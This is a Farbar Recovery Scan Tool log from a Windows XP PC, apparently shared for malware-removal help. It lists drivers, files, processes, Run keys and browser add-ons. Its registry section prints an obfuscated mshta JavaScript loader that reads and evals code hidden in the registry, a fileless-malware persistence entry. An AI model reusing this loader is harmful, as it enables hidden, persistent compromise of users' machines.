R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtDHDAud.sys [5876224 2009-10-23] (Realtek Semiconductor Corp.)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [209960 2009-05-31] (Broadcom Corporation)
R3 LEqdUsb; C:\WINDOWS\System32\Drivers\LEqdUsb.Sys [42264 2013-05-22] (Logitech, Inc.)
R3 LHidEqd; C:\WINDOWS\System32\Drivers\LHidEqd.Sys [10136 2013-05-22] (Logitech, Inc.)
S3 libusb0; C:\WINDOWS\System32\DRIVERS\libusb0.sys [42592 2013-08-30] (hxxp://libusb-win32.sourceforge.net)
S3 LVUSBSta; C:\WINDOWS\System32\DRIVERS\LVUSBSta.sys [41888 2007-05-11] (Logitech Inc.)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
S3 NuidFltr; C:\WINDOWS\System32\DRIVERS\NuidFltr.sys [14736 2009-05-09] (Microsoft Corporation)
S0 cerc6; no ImagePath
S4 IntelIde; no ImagePath
U1 WS2IFSL; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:31 - 2015-11-14 20:32 - 00000000 ____D C:\FRST
2015-11-14 14:55 - 2015-11-14 14:56 - 00000000 ___HD C:\bb64b446
2015-11-11 11:51 - 2015-11-14 20:32 - 00000664 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2015-11-04 19:16 - 2015-11-06 18:36 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-11-03 06:47 - 2015-11-03 06:47 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\AVG
2015-11-03 06:45 - 2015-11-03 06:45 - 00000673 _____ C:\Documents and Settings\All Users\Desktop\AVG Protection.lnk
2015-11-03 06:40 - 2015-11-03 06:43 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Avg
2015-11-03 06:39 - 2015-11-03 06:40 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\AvgSetupLog
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:33 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Temp
2015-11-14 20:32 - 2010-08-29 06:33 - 00000974 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003UA.job
2015-11-14 20:24 - 2012-07-26 18:32 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\uTorrent
2015-11-14 20:20 - 2010-03-30 13:46 - 01585423 _____ C:\WINDOWS\WindowsUpdate.log
2015-11-14 20:16 - 2010-03-30 06:32 - 00607774 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-11-14 20:12 - 2010-11-07 08:24 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-14 20:12 - 2010-03-30 06:34 - 00000159 _____ C:\WINDOWS\wiadebug.log
2015-11-14 20:12 - 2010-03-30 06:34 - 00000050 _____ C:\WINDOWS\wiaservc.log
2015-11-14 20:11 - 2014-04-09 02:24 - 00000220 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-11-14 20:11 - 2010-03-30 13:50 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-11-14 19:56 - 2012-07-26 18:27 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\MFAData
2015-11-14 19:53 - 2010-11-07 08:24 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-14 18:51 - 2010-03-30 15:12 - 00393216 _____ C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-11-14 11:53 - 2010-03-30 13:50 - 00032476 _____ C:\WINDOWS\SchedLgU.Txt
2015-11-14 07:51 - 2008-04-14 05:00 - 00002206 _____ C:\WINDOWS\system32\wpa.dbl
2015-11-12 22:03 - 2010-03-30 13:51 - 00000178 ___SH C:\Documents and Settings\Geny\ntuser.ini
2015-11-12 06:32 - 2010-08-29 06:33 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003Core.job
2015-11-11 14:38 - 2015-06-02 07:46 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Avg
2015-11-11 12:56 - 2015-05-02 06:29 - 00001813 _____ C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
2015-11-11 10:59 - 2015-09-24 11:16 - 00000000 ___HD C:\Documents and Settings\All Users\Application Data\{42793930-2684-4C15-9B87-9CEF8846A875}
2015-11-11 10:35 - 2010-04-06 19:30 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Apple
2015-11-09 08:06 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny
2015-11-08 15:00 - 2014-04-09 02:24 - 00000214 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
2015-11-08 03:15 - 2012-05-05 10:23 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2015-11-03 06:47 - 2012-07-26 18:55 - 00000000 ____D C:\Program Files\AVG
2015-11-03 06:46 - 2014-03-31 08:20 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\AVG
2015-11-03 06:45 - 2013-10-10 02:09 - 00219030 _____ C:\WINDOWS\setupapi.log
2015-10-29 17:40 - 2010-04-18 18:49 - 00148992 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-29 17:40 - 2010-04-17 16:41 - 00000069 _____ C:\WINDOWS\NeroDigital.ini
2015-10-28 16:15 - 2012-06-30 19:27 - 00780488 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-10-28 16:15 - 2011-06-03 19:23 - 00142536 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-10-28 16:15 - 2010-03-31 09:20 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Adobe
2015-10-21 16:24 - 2011-10-07 05:23 - 00229296 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgldx86.sys
2015-10-21 16:14 - 2011-08-08 05:08 - 00192944 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgmfx86.sys
2015-10-19 08:06 - 2014-06-17 15:17 - 00243632 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
==================== Files in the root of some directories =======
2015-11-11 11:51 - 2015-11-14 20:32 - 0000664 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2010-04-18 18:49 - 2015-10-29 17:40 - 0148992 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-11-11 08:07 - 2012-11-11 08:07 - 0027520 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\dt.dat
2011-01-04 14:30 - 2011-01-06 10:26 - 0001940 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
Some files in TEMP:
====================
C:\Documents and Settings\Geny\Local Settings\Temp\11.exe
C:\Documents and Settings\Geny\Local Settings\Temp\avg-03e82148-59f7-4537-a3dc-287390295d3f.exe
C:\Documents and Settings\Geny\Local Settings\Temp\difxapi.dll
C:\Documents and Settings\Geny\Local Settings\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprowbg4.dll
C:\Documents and Settings\Geny\Local Settings\Temp\en_ww_Package.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_AX_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_PL_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\GLF1B.tmp.tbZyng.dll
C:\Documents and Settings\Geny\Local Settings\Temp\hpzmsi01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\hpzscr01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\install_reader10_en_air_gtbp_mssa_aih[1].exe
C:\Documents and Settings\Geny\Local Settings\Temp\ose00000.exe
C:\Documents and Settings\Geny\Local Settings\Temp\TB_441.exe
C:\Documents and Settings\Geny\Local Settings\Temp\UNINSTALL.EXE
C:\Documents and Settings\Geny\Local Settings\Temp\utt8CF.tmp.exe
C:\Documents and Settings\Geny\Local Settings\Temp\Zynga.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
==================== End of FRST.txt ============================
Ran by Geny (administrator) on GENY-380 (14-11-2015 20:31:57)
Running from D:\My Docs\Downloads
Loaded Profiles: Geny (Available Profiles: Geny)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\Av\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
() C:\WINDOWS\system32\WLTRYSVC.EXE
(Dell Inc.) C:\WINDOWS\system32\BCMWLTRY.EXE
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Fitbit, Inc.) C:\Program Files\Fitbit Connect\FitbitConnectService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.28.15\GoogleCrashHandler.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgnsx.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTDCPL.EXE
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Dell Inc.) C:\WINDOWS\system32\WLTRAY.EXE
(CyberLink Corp.) C:\Program Files\PowerDVD DX\PDVDDXSrv.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\concentr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\wfcrun32.exe
(Nero AG) C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Prolific Technology Inc.) C:\WINDOWS\system32\IoctlSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\cmd.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\PresentationHost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTDCPL.EXE [2691072 2009-08-26] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\WINDOWS\system32\WLTRAY.exe [2498560 2010-03-30] (Dell Inc.)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\PowerDVD DX\PDVDDXSrv.exe [128232 2009-09-11] (CyberLink Corp.)
HKLM\...\Run: [NeroFilterCheck] => C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe [570664 2008-04-28] (Nero AG)
HKLM\...\Run: [NBKeyScan] => C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe [2221352 2008-02-18] (Nero AG)
HKLM\...\Run: [ConnectionCenter] => C:\Program Files\Citrix\ICA Client\concentr.exe [300472 2010-05-12] (Citrix Systems, Inc.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Av\avgui.exe [3826600 2015-10-30] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [2296600 2013-07-31] (Logitech, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157480 2015-04-06] (Apple Inc.)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguix.exe [1130408 2015-10-16] (AVG Technologies CZ, s.r.o.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll [2013-06-13] (Logitech, Inc.)
HKLM\...\Policies\Explorer\Run: [**27da8125<*>] => mshta javascript:ZXCBOya0="kcWtjWWr7";S2a1=new%20ActiveXObject("WScript.Shell");kmdIO6x7e="3P3p1lzn";cue5X8=S2a1.RegRead("HKLM\\software\\056439a146\\8c68058d");XfgI4iLgH="vPeg49";eval(cue5X8);LJ9JHh7 (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer: [NoCDBurning] 0
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [Google Update] => C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-22] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-11-07] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Documents and Settings\Geny\Application Data\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID ROC (the data entry has 29 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Documents and Settings\Geny\Application Data\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID 09 (the data entry has 3 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_1113a] => C:\Documents and Settings\Geny\Application Data\AVG 1113a Campaign\AVG-Secure-Search-Update-1113a.exe /PROMPT /mid=f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 /CMPID=1113 (the data entry has 1 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [uTorrent] => C:\Documents and Settings\Geny\Application Data\uTorrent\uTorrent.exe [1822048 2015-10-13] (BitTorrent Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [{F9D772C4-AD01-40E2-BACC-F7300FE9592E}] => regsvr32.exe "C:\Documents and Settings\Geny\Application Data\Quyitv\CofeDxun.dll"
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {4eee6362-2ae8-11e0-9d51-002564c4b1e6} - G:\setupSNK.exe
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {b5ec1652-5a4f-11df-9d22-002564c4b1e6} - F:\LaunchU3.exe -a
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [9216 2008-04-14] (Microsoft Corporation)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\Av\avgrsx.exe /sync /restart
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.65
Tcpip\..\Interfaces\{7203B3FB-70D8-4079-B244-FA1D5DDCC534}: [DhcpNameServer] 192.168.0.1 205.171.2.65
Internet Explorer:
==================
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.facebook.com/
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll (Conduit Ltd.)
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> DefaultScope {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {91D0C420-E910-4A17-BE98-51976FED3BC7} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
BHO: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll => No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Zynga Toolbar -> {7b13ec3e-999a-4b70-b9cb-2617b8323822} -> C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-03-30] (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKLM - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Zynga Toolbar - {7B13EC3E-999A-4B70-B9CB-2617B8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
DPF: {32C3FEAE-0877-4767-8C20-62A5829A0945} hxxp://static.ak.facebook.com/fbplugin/win32/axfbootloader.cab?1270703312359
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1269983539687
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
FireFox:
========
FF ProfilePath: C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Homepage: hxxps://www.lds.org/
FF Keyword.URL:
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_19_0_0_226.dll [2015-10-28] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @facebook.com/FBPlugin,version=1.0.3 -> C:\Documents and Settings\Geny\Application Data\Facebook\npfbplugin_1_0_3.dll [2010-03-05] ( )
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/GoogleTalkPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/O1DPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=3 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=9 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CCMSDK.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\cgpcfg.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CgpCore.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\confmgr.dll [2010-05-12] (Citrix Systems, Inc.)
